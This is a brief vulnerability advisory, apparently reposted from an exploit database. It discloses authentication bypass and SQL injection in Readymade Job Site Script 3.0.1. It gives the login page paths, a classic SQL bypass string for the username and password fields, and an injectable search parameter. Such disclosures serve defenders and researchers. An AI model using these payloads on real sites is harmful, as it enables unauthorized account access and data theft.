###########################

# Readymade Job Site Script 3.0.1 SQL Injection Vulnerability

###########################

################################################
#Title: READYMADE JOB SITE SCRIPT v3.0.1  - Authentication Bypass & SQL
injection
#Credit: Bilal KARDADOU
#Vendor: http://www.2daybiz.com
#Vendor URL:
http://www.2daybiz.com/content/products/40-readymade-job-site-script.php
#Product: READYMADE JOB SITE SCRIPT v3.0.1
#Google Dork: N/A
################################################
#
#  Product & Service Introduction:
#
#  Our Readymade PHP job site script make your own job portal website set
in motion,
#  with our advanced PHP job site script that helps job seekers to search
jobs in efficient manner.
#  Job portal script are developed in such way that has functionalities
similar to leading job portal like Naukri.com, Monster.com, etc..,
#  our script offer various services for employers as well as job seekers.
#
#
# http://localhost/eboss/employer/employer_login.php
#      http://localhost/eboss/seeker_login.php
#
# Username: 'or''='
# Password: 'or''='
#
#
# --SQL Injection--
# http://localhost/eboss/job_search_result.php?j_cat=11[SQL]&no_no=1
#
# PoC:
#  http://prnt.sc/ekcek6
#
# Bilal KARDADOU - https://www.linkedin.com/in/bilal-kardadou-21a000127)
################################################

-- 
*Bilal Kardadou*
IT Security Consultant
*E* : b.kardadou@capvalue.ma | *E* : bilalkardadou@gmail.com |

###########################

# Iranian Exploit DataBase = http://IeDb.Ir [2017-03-18]

###########################